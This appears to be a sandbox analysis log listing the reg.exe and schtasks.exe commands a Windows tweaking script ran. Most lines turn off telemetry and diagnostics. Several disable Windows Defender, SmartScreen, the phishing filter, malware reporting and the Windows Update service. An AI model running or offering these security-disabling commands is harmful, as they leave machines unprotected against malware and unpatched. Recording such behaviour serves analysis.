            PID 4456 | C:\Windows\system32\reg.exe | Reg.exe add "HKLM\SOFTWARE\Microsoft\WindowsSelfHost\UI\Strings" /v "DiagnosticLinkText" /t REG_SZ /d "" /f
            PID 4620 | C:\Windows\system32\reg.exe | Reg.exe add "HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t REG_DWORD /d "0" /f
              - Modifies registry class
            PID 5404 | C:\Windows\system32\reg.exe | Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\TabletPC" /v "PreventHandwritingDataSharing" /t REG_DWORD /d "1" /f
            PID 5492 | C:\Windows\system32\reg.exe | Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\HandwritingErrorReports" /v "PreventHandwritingErrorReports" /t REG_DWORD /d "1" /f
            PID 680 | C:\Windows\system32\reg.exe | Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\AppCompat" /v "DisableInventory" /t REG_DWORD /d "1" /f
            PID 5072 | C:\Windows\system32\reg.exe | Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\AppCompat" /v "DisableUAR" /t REG_DWORD /d "1" /f
            PID 5496 | C:\Windows\system32\reg.exe | Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Personalization" /v "NoLockScreenCamera" /t REG_DWORD /d "1" /f
            PID 2340 | C:\Windows\system32\reg.exe | Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AdvertisingInfo" /v "Enabled" /t REG_DWORD /d "0" /f
            PID 3928 | C:\Windows\system32\reg.exe | Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\AdvertisingInfo" /v "Enabled" /t REG_DWORD /d "0" /f
            PID 1548 | C:\Windows\system32\reg.exe | Reg.exe add "HKCU\Software\Microsoft\Input\TIPC" /v "Enabled" /t REG_DWORD /d "0" /f
            PID 4860 | C:\Windows\system32\reg.exe | Reg.exe add "HKLM\SOFTWARE\Microsoft\PolicyManager\current\device\System" /v "AllowExperimentation" /t REG_DWORD /d "0" /f
            PID 4968 | C:\Windows\system32\reg.exe | Reg.exe add "HKLM\SOFTWARE\Microsoft\PolicyManager\current\device\Bluetooth" /v "AllowAdvertising" /t REG_DWORD /d "0" /f
            PID 752 | C:\Windows\system32\reg.exe | Reg.exe add "HKLM\SOFTWARE\Microsoft\SQMClient\Windows" /v "CEIPEnable" /t REG_DWORD /d "0" /f
            PID 5436 | C:\Windows\system32\reg.exe | Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Messaging" /v "AllowMessageSync" /t REG_DWORD /d "0" /f
            PID 4908 | C:\Windows\system32\reg.exe | Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Biometrics" /v "Enabled" /t REG_DWORD /d "0" /f
            PID 2128 | C:\Windows\system32\reg.exe | Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\PushNotifications" /v "ToastEnabled" /t REG_DWORD /d "0" /f
            PID 3836 | C:\Windows\system32\reg.exe | Reg.exe add "HKCU\Control Panel\International\User Profile" /v "HttpAcceptLanguageOptOut" /t REG_DWORD /d "1" /f
            PID 1536 | C:\Windows\system32\reg.exe | Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d "0" /f
            PID 3948 | C:\Windows\system32\reg.exe | Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeviceAccess\Global\{C1D23ACC-752B-43E5-8448-8D0E519CD6D6}" /v "Value" /t REG_SZ /d "Deny" /f
            PID 2928 | C:\Windows\system32\reg.exe | Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "Start_TrackProgs" /t REG_DWORD /d "0" /f
            PID 5680 | C:\Windows\system32\reg.exe | Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "ShowSyncProviderNotifications" /t REG_DWORD /d "0" /f
            PID 2044 | C:\Windows\system32\reg.exe | Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeviceAccess\Global\{2297E4E2-5DBE-466D-A12B-0F8286F0D9CA}" /v "Value" /t REG_SZ /d "Deny" /f
            PID 2464 | C:\Windows\system32\reg.exe | Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeviceAccess\Global\{E5323777-F976-4f5b-9B55-B94699C46E44}" /v "Value" /t REG_SZ /d "Deny" /f
            PID 5780 | C:\Windows\system32\reg.exe | Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeviceAccess\Global\{2EEF81BE-33FA-4800-9670-1CD474972C3F}" /v "Value" /t REG_SZ /d "Deny" /f
            PID 528 | C:\Windows\system32\reg.exe | Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeviceAccess\Global\{52079E78-A92B-413F-B213-E8FE35712E72}" /v "Value" /t REG_SZ /d "Deny" /f
            PID 5728 | C:\Windows\system32\reg.exe | Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeviceAccess\Global\{7D7E8402-7C54-4821-A34E-AEEFD62DED93}" /v "Value" /t REG_SZ /d "Deny" /f
            PID 500 | C:\Windows\system32\reg.exe | Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeviceAccess\Global\{D89823BA-7180-4B81-B50C-7E471E6121A3}" /v "Value" /t REG_SZ /d "Deny" /f
            PID 3248 | C:\Windows\system32\reg.exe | Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeviceAccess\Global\{8BC668CF-7728-45BD-93F8-CF2B3B41D7AB}" /v "Value" /t REG_SZ /d "Deny" /f
            PID 5784 | C:\Windows\system32\reg.exe | Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeviceAccess\Global\{9231CB4C-BF57-4AF3-8C55-FDA7BFCC04C5}" /v "Value" /t REG_SZ /d "Deny" /f
            PID 5308 | C:\Windows\system32\reg.exe | Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeviceAccess\Global\{E390DF20-07DF-446D-B962-F5C953062741}" /v "Value" /t REG_SZ /d "Deny" /f
            PID 1736 | C:\Windows\system32\reg.exe | Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeviceAccess\Global\{992AFA70-6F47-4148-B3E9-3003349C1548}" /v "Value" /t REG_SZ /d "Deny" /f
            PID 3008 | C:\Windows\system32\reg.exe | Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\BackgroundAccessApplications" /v "GlobalUserDisabled" /t REG_DWORD /d "1" /f
            PID 2236 | C:\Windows\system32\reg.exe | Reg.exe add "HKLM\SYSTEM\ControlSet001\Services\DiagTrack" /v "Start" /t REG_DWORD /d "4" /f
            PID 5788 | C:\Windows\system32\reg.exe | Reg.exe add "HKLM\SYSTEM\ControlSet001\Services\dmwappushservice" /v "Start" /t REG_DWORD /d "4" /f
            PID 5080 | C:\Windows\system32\reg.exe | Reg.exe add "HKLM\SYSTEM\ControlSet001\Control\WMI\Autologger\AutoLogger-Diagtrack-Listener" /v "Start" /t REG_DWORD /d "0" /f
            PID 3804 | C:\Windows\system32\reg.exe | Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\WMDRM" /v "DisableOnline" /t REG_DWORD /d "1" /f
            PID 5128 | C:\Windows\system32\reg.exe | Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeviceAccess\Global\{A8804298-2D5F-42E3-9531-9C8C39EB29CE}" /v "Value" /t REG_SZ /d "Deny" /f
            PID 5392 | C:\Windows\system32\reg.exe | Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeviceAccess\Global\LooselyCoupled" /v "Value" /t REG_SZ /d "Deny" /f
            PID 5648 | C:\Windows\system32\reg.exe | Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\CredUI" /v "DisablePasswordReveal" /t REG_DWORD /d "1" /f
            PID 5696 | C:\Windows\system32\reg.exe | Reg.exe add "HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main" /v "DoNotTrack" /t REG_DWORD /d "1" /f
              - Modifies registry class
            PID 5544 | C:\Windows\system32\reg.exe | Reg.exe add "HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main" /v "OptimizeWindowsSearchResultsForScreenReaders" /t REG_DWORD /d "0" /f
              - Modifies registry class
            PID 2028 | C:\Windows\system32\reg.exe | Reg.exe add "HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead" /v "FPEnabled" /t REG_DWORD /d "0" /f
              - Modifies registry class
            PID 5724 | C:\Windows\system32\reg.exe | Reg.exe add "HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\User\Default\SearchScopes" /v "ShowSearchSuggestionsGlobal" /t REG_DWORD /d "0" /f
              - Modifies registry class
            PID 5640 | C:\Windows\system32\reg.exe | Reg.exe add "HKLM\SOFTWARE\Microsoft\PolicyManager\current\device\Browser" /v "AllowAddressBarDropdown" /t REG_DWORD /d "0" /f
            PID 5424 | C:\Windows\system32\reg.exe | Reg.exe add "HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Privacy" /v "EnableEncryptedMediaExtensions" /t REG_DWORD /d "0" /f
              - Modifies registry class
            PID 5288 | C:\Windows\system32\reg.exe | Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\SettingSync" /v "SyncPolicy" /t REG_DWORD /d "5" /f
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\SettingSync\Groups\Personalization" /v "Enabled" /t REG_DWORD /d "0" /f7⤵PID:5364
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\SettingSync\Groups\BrowserSettings" /v "Enabled" /t REG_DWORD /d "0" /f7⤵PID:5700
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\SettingSync\Groups\Credentials" /v "Enabled" /t REG_DWORD /d "0" /f7⤵PID:2160
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\SettingSync\Groups\Language" /v "Enabled" /t REG_DWORD /d "0" /f7⤵PID:5160
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\SettingSync\Groups\Accessibility" /v "Enabled" /t REG_DWORD /d "0" /f7⤵PID:4048
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\SettingSync\Groups\Windows" /v "Enabled" /t REG_DWORD /d "0" /f7⤵PID:4268
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v "AllowCloudSearch" /t REG_DWORD /d "0" /f7⤵PID:5208
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v "ConnectedSearchUseWeb" /t REG_DWORD /d "0" /f7⤵PID:3000
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v "DisableWebSearch" /t REG_DWORD /d "1" /f7⤵PID:3196
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v "AllowSearchToUseLocation" /t REG_DWORD /d "0" /f7⤵PID:3596
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v "AllowCortana" /t REG_DWORD /d "0" /f7⤵PID:4904
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Speech_OneCore\Preferences" /v "ModelDownloadAllowed" /t REG_DWORD /d "0" /f7⤵PID:404
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\InputPersonalization\TrainedDataStore" /v "HarvestContacts" /t REG_DWORD /d "0" /f7⤵PID:4652
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\InputPersonalization" /v "RestrictImplicitTextCollection" /t REG_DWORD /d "1" /f7⤵PID:3304
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\InputPersonalization" /v "RestrictImplicitInkCollection" /t REG_DWORD /d "1" /f7⤵PID:4604
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\Personalization\Settings" /v "AcceptedPrivacyPolicy" /t REG_DWORD /d "0" /f7⤵PID:4260
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\LocationAndSensors" /v "DisableWindowsLocationProvider" /t REG_DWORD /d "1" /f7⤵PID:5824
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\LocationAndSensors" /v "DisableLocationScripting" /t REG_DWORD /d "1" /f7⤵PID:5200
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Sensor\Permissions\{BFA794E4-F964-4FDB-90F6-51056BFE4B44}" /v "SensorPermissionState" /t REG_DWORD /d "0" /f7⤵PID:2560
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\DataCollection" /v "AllowTelemetry" /t REG_DWORD /d "0" /f7⤵PID:2940
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\DataCollection" /v "DoNotShowFeedbackNotifications" /t REG_DWORD /d "1" /f7⤵PID:4760
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\DataCollection" /v "AllowTelemetry" /t REG_DWORD /d "0" /f7⤵PID:2600
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\DeliveryOptimization" /v "DODownloadMode" /t REG_DWORD /d "0" /f7⤵PID:5836
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeliveryOptimization" /v "SystemSettingsDownloadMode" /t REG_DWORD /d "0" /f7⤵PID:5892
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Speech" /v "AllowSpeechModelUpdate" /t REG_DWORD /d "0" /f7⤵PID:5768
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" /v "DeferUpgrade" /t REG_DWORD /d "1" /f7⤵PID:5900
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" /v "DeferUpgradePeriod" /t REG_DWORD /d "1" /f7⤵PID:5988
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" /v "DeferUpdatePeriod" /t REG_DWORD /d "0" /f7⤵PID:2096
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Device Metadata" /v "PreventDeviceMetadataFromNetwork" /t REG_DWORD /d "1" /f7⤵PID:5948
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsStore\WindowsUpdate" /v "AutoDownload" /t REG_DWORD /d "2" /f7⤵PID:5936
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "NoAutoUpdate" /t REG_DWORD /d "1" /f7⤵PID:460
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SYSTEM\ControlSet001\Services\wuauserv" /v "Start" /t REG_DWORD /d "4" /f7⤵
- Modifies security service
PID:5980
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Services\7971f918-a847-4430-9279-4a52d1efe18d" /v "RegisteredWithAU" /t REG_DWORD /d "0" /f7⤵PID:5952
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\OneDrive" /v "PreventNetworkTrafficPreUserSignIn" /t REG_DWORD /d "1" /f7⤵PID:5992
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /t REG_DWORD /d "0" /f7⤵PID:5976
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f7⤵PID:6020
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t REG_DWORD /d "1" /f7⤵PID:6044
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f7⤵PID:2408
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\Siuf\Rules" /v "NumberOfSIUFInPeriod" /t REG_DWORD /d "0" /f7⤵PID:5472
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\Siuf\Rules" /v "PeriodInNanoSeconds" /t REG_DWORD /d "0" /f7⤵PID:5816
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Search" /v "BingSearchEnabled" /t REG_DWORD /d "0" /f7⤵PID:6060
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" /v "SilentInstalledAppsEnabled" /t REG_DWORD /d "0" /f7⤵PID:6088
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" /v "SoftLandingEnabled" /t REG_DWORD /d "0" /f7⤵PID:1408
-
-
C:\Windows\system32\schtasks.exe  schtasks /end /tn "\Microsoft\Windows\Customer Experience Improvement Program\Consolidator"  PID:4608
C:\Windows\system32\schtasks.exe  schtasks /change /tn "\Microsoft\Windows\Customer Experience Improvement Program\Consolidator" /disable  PID:1412
C:\Windows\system32\schtasks.exe  schtasks /end /tn "\Microsoft\Windows\Customer Experience Improvement Program\BthSQM"  PID:1064
C:\Windows\system32\schtasks.exe  schtasks /change /tn "\Microsoft\Windows\Customer Experience Improvement Program\BthSQM" /disable  PID:3192
C:\Windows\system32\schtasks.exe  schtasks /end /tn "\Microsoft\Windows\Customer Experience Improvement Program\KernelCeipTask"  PID:3788
C:\Windows\system32\schtasks.exe  schtasks /change /tn "\Microsoft\Windows\Customer Experience Improvement Program\KernelCeipTask" /disable  PID:4828
C:\Windows\system32\schtasks.exe  schtasks /end /tn "\Microsoft\Windows\Customer Experience Improvement Program\UsbCeip"  PID:1188
C:\Windows\system32\schtasks.exe  schtasks /change /tn "\Microsoft\Windows\Customer Experience Improvement Program\UsbCeip" /disable  PID:264
C:\Windows\system32\schtasks.exe  schtasks /end /tn "\Microsoft\Windows\Customer Experience Improvement Program\Uploader"  PID:1952
C:\Windows\system32\schtasks.exe  schtasks /change /tn "\Microsoft\Windows\Customer Experience Improvement Program\Uploader" /disable  PID:2140
C:\Windows\system32\schtasks.exe  schtasks /end /tn "\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser"  PID:2636
C:\Windows\system32\schtasks.exe  schtasks /change /tn "\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser" /disable  PID:3020
C:\Windows\system32\schtasks.exe  schtasks /end /tn "\Microsoft\Windows\Application Experience\ProgramDataUpdater"  PID:6140
C:\Windows\system32\schtasks.exe  schtasks /change /tn "\Microsoft\Windows\Application Experience\ProgramDataUpdater" /disable  PID:3940
C:\Windows\system32\schtasks.exe  schtasks /end /tn "\Microsoft\Windows\Application Experience\StartupAppTask"  PID:4252
C:\Windows\system32\schtasks.exe  schtasks /change /tn "\Microsoft\Windows\Application Experience\StartupAppTask" /disable"  PID:1696
C:\Windows\system32\schtasks.exe  schtasks /end /tn "\Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticDataCollector"  PID:5380
C:\Windows\system32\schtasks.exe  schtasks /change /tn "\Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticDataCollector" /disable  PID:1616
C:\Windows\system32\schtasks.exe  schtasks /end /tn "\Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticResolver"  PID:2492
C:\Windows\system32\schtasks.exe  schtasks /change /tn "\Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticResolver" /disable  PID:1240
C:\Windows\system32\schtasks.exe  schtasks /end /tn "\Microsoft\Windows\Power Efficiency Diagnostics\AnalyzeSystem"  PID:5372
C:\Windows\system32\schtasks.exe  schtasks /change /tn "\Microsoft\Windows\Power Efficiency Diagnostics\AnalyzeSystem" /disable  PID:3068
C:\Windows\system32\schtasks.exe  schtasks /end /tn "\Microsoft\Windows\Shell\FamilySafetyMonitor"  PID:4712
C:\Windows\system32\schtasks.exe  schtasks /change /tn "\Microsoft\Windows\Shell\FamilySafetyMonitor" /disable  PID:1760
C:\Windows\system32\schtasks.exe  schtasks /end /tn "\Microsoft\Windows\Shell\FamilySafetyRefresh"  PID:5396
C:\Windows\system32\schtasks.exe  schtasks /change /tn "\Microsoft\Windows\Shell\FamilySafetyRefresh" /disable  PID:5412
C:\Windows\system32\schtasks.exe  schtasks /end /tn "\Microsoft\Windows\Shell\FamilySafetyUpload"  PID:5532
C:\Windows\system32\schtasks.exe  schtasks /change /tn "\Microsoft\Windows\Shell\FamilySafetyUpload" /disable  PID:2268
C:\Windows\system32\schtasks.exe  schtasks /end /tn "\Microsoft\Windows\Autochk\Proxy"  PID:5584
C:\Windows\system32\schtasks.exe  schtasks /change /tn "\Microsoft\Windows\Autochk\Proxy" /disable  PID:5504
C:\Windows\system32\schtasks.exe  schtasks /end /tn "\Microsoft\Windows\Maintenance\WinSAT"  PID:5516
C:\Windows\system32\schtasks.exe  schtasks /change /tn "\Microsoft\Windows\Maintenance\WinSAT" /disable  PID:5500
C:\Windows\system32\schtasks.exe  schtasks /end /tn "\Microsoft\Windows\Application Experience\AitAgent"  PID:1740
C:\Windows\system32\schtasks.exe  schtasks /change /tn "\Microsoft\Windows\Application Experience\AitAgent" /disable  PID:2032
C:\Windows\system32\schtasks.exe  schtasks /end /tn "\Microsoft\Windows\Windows Error Reporting\QueueReporting"  PID:5040
C:\Windows\system32\schtasks.exe  schtasks /change /tn "\Microsoft\Windows\Windows Error Reporting\QueueReporting" /disable  PID:4720
C:\Windows\system32\schtasks.exe  schtasks /end /tn "\Microsoft\Windows\CloudExperienceHost\CreateObjectTask"  PID:5620
C:\Windows\system32\schtasks.exe  schtasks /change /tn "\Microsoft\Windows\CloudExperienceHost\CreateObjectTask" /disable  PID:5476
C:\Windows\system32\schtasks.exe  schtasks /end /tn "\Microsoft\Windows\DiskFootprint\Diagnostics"  PID:5180
C:\Windows\system32\schtasks.exe  schtasks /change /tn "\Microsoft\Windows\DiskFootprint\Diagnostics" /disable  PID:5568
C:\Windows\system32\schtasks.exe  schtasks /end /tn "\Microsoft\Windows\FileHistory\File History (maintenance mode)"  PID:3484
C:\Windows\system32\schtasks.exe  schtasks /change /tn "\Microsoft\Windows\FileHistory\File History (maintenance mode)" /disable  PID:1668
C:\Windows\system32\schtasks.exe  schtasks /end /tn "\Microsoft\Windows\PI\Sqm-Tasks"  PID:5156
C:\Windows\system32\schtasks.exe  schtasks /change /tn "\Microsoft\Windows\PI\Sqm-Tasks" /disable  PID:4344
C:\Windows\system32\schtasks.exe  schtasks /end /tn "\Microsoft\Windows\NetTrace\GatherNetworkInfo"  PID:3948
C:\Windows\system32\schtasks.exe  schtasks /change /tn "\Microsoft\Windows\NetTrace\GatherNetworkInfo" /disable  PID:2928
C:\Windows\system32\schtasks.exe  schtasks /end /tn "\Microsoft\Windows\AppID\SmartScreenSpecific"  PID:3168
C:\Windows\system32\schtasks.exe  schtasks /change /tn "\Microsoft\Windows\AppID\SmartScreenSpecific" /disable  PID:2368
C:\Windows\system32\schtasks.exe  schtasks /Change /TN "Microsoft\Windows\SettingSync\BackgroundUploadTask" /Disable  PID:1908
C:\Windows\system32\schtasks.exe  schtasks /Change /TN "Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319" /Disable schtasks /Change /TN "Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 64" /Disable  PID:400
C:\Windows\system32\schtasks.exe  schtasks /Change /TN "Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 64 Critical" /Disable  PID:5756
C:\Windows\system32\schtasks.exe  schtasks /Change /TN "Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 Critical" /Disable  PID:5676
C:\Windows\system32\schtasks.exe  schtasks /Change /TN "Microsoft\Windows\AppID\SmartScreenSpecific" /Disable  PID:5736
C:\Windows\system32\schtasks.exe  schtasks /Change /TN "Microsoft\Windows\ApplicationData\CleanupTemporaryState" /Disable  PID:5760
C:\Windows\system32\schtasks.exe  schtasks /Change /TN "Microsoft\Windows\ApplicationData\DsSvcCleanup" /Disable  PID:5340
C:\Windows\system32\schtasks.exe  schtasks /Change /TN "Microsoft\Windows\Application Experience\AitAgent" /Disable  PID:3692
C:\Windows\system32\schtasks.exe  schtasks /Change /TN "Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser" /Disable  PID:1724
C:\Windows\system32\schtasks.exe  schtasks /Change /TN "Microsoft\Windows\Application Experience\ProgramDataUpdater" /Disable  PID:3008
C:\Windows\system32\schtasks.exe  schtasks /Change /TN "Microsoft\Windows\Application Experience\StartupAppTask" /Disable  PID:2236
C:\Windows\system32\schtasks.exe  schtasks /Change /TN "Microsoft\Windows\Autochk\Proxy" /Disable  PID:5788
C:\Windows\system32\schtasks.exe  schtasks /Change /TN "Microsoft\Windows\CloudExperienceHost\CreateObjectTask" /Disable  PID:5008
C:\Windows\system32\schtasks.exe  schtasks /Change /TN "Microsoft\Windows\Customer Experience Improvement Program\Consolidator" /Disable  PID:5344
C:\Windows\system32\schtasks.exe  schtasks /Change /TN "Microsoft\Windows\Customer Experience Improvement Program\KernelCeipTask" /Disable  PID:5428
C:\Windows\system32\schtasks.exe  schtasks /Change /TN "Microsoft\Windows\Customer Experience Improvement Program\UsbCeip" /Disable  PID:5520
C:\Windows\system32\schtasks.exe  schtasks /Change /TN "Microsoft\Windows\Customer Experience Improvement Program\BthSQM" /Disable  PID:1112
C:\Windows\system32\schtasks.exe  schtasks /Change /TN "Microsoft\Windows\Customer Experience Improvement Program\HypervisorFlightingTask" /Disable  PID:5692
C:\Windows\system32\schtasks.exe  schtasks /Change /TN "Microsoft\Windows\Diagnosis\Scheduled" /Disable  PID:5456
C:\Windows\system32\schtasks.exe  schtasks /Change /TN "Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticDataCollector" /Disable  PID:4804
C:\Windows\system32\schtasks.exe  schtasks /Change /TN "Microsoft\Windows\DiskFootprint\Diagnostics" /Disable  PID:5264
C:\Windows\system32\schtasks.exe  schtasks /Change /TN "Microsoft\Windows\DiskFootprint\StorageSense" /Disable  PID:5508
C:\Windows\system32\schtasks.exe  schtasks /Change /TN "Microsoft\Windows\ErrorDetails\EnableErrorDetailsUpdate" /Disable  PID:5356
C:\Windows\system32\schtasks.exe  schtasks /Change /TN "Microsoft\Windows\Feedback\Siuf\DmClient" /Disable  PID:5656
C:\Windows\system32\schtasks.exe  schtasks /Change /TN "Microsoft\Windows\Feedback\Siuf\DmClientOnScenarioDownload" /Disable  PID:5184
C:\Windows\system32\schtasks.exe  schtasks /Change /TN "Microsoft\Windows\File Classification Infrastructure\Property Definition Sync" /Disable  PID:4048
C:\Windows\system32\schtasks.exe  schtasks /Change /TN "Microsoft\Windows\Management\Provisioning\Logon" /Disable  PID:4268
C:\Windows\system32\schtasks.exe  schtasks /Change /TN "Microsoft\Windows\Maintenance\WinSAT" /Disable  PID:5208
C:\Windows\system32\schtasks.exe  schtasks /Change /TN "Microsoft\Windows\Maps\MapsToastTask" /Disable  PID:1556
C:\Windows\system32\schtasks.exe  schtasks /Change /TN "Microsoft\Windows\Maps\MapsUpdateTask" /Disable  PID:3124
C:\Windows\system32\schtasks.exe  schtasks /Change /TN "Microsoft\Windows\Mobile Broadband Accounts\MNO Metadata Parser" /Disable  PID:5084
C:\Windows\system32\schtasks.exe  schtasks /Change /TN "Microsoft\Windows\Multimedia\SystemSoundsService" /Disable  PID:3196
C:\Windows\system32\schtasks.exe  schtasks /Change /TN "Microsoft\Windows\NlaSvc\WiFiTask" /Disable  PID:3596
C:\Windows\system32\schtasks.exe  schtasks /Change /TN "Microsoft\Windows\NetCfg\BindingWorkItemQueueHandler" /Disable  PID:4904
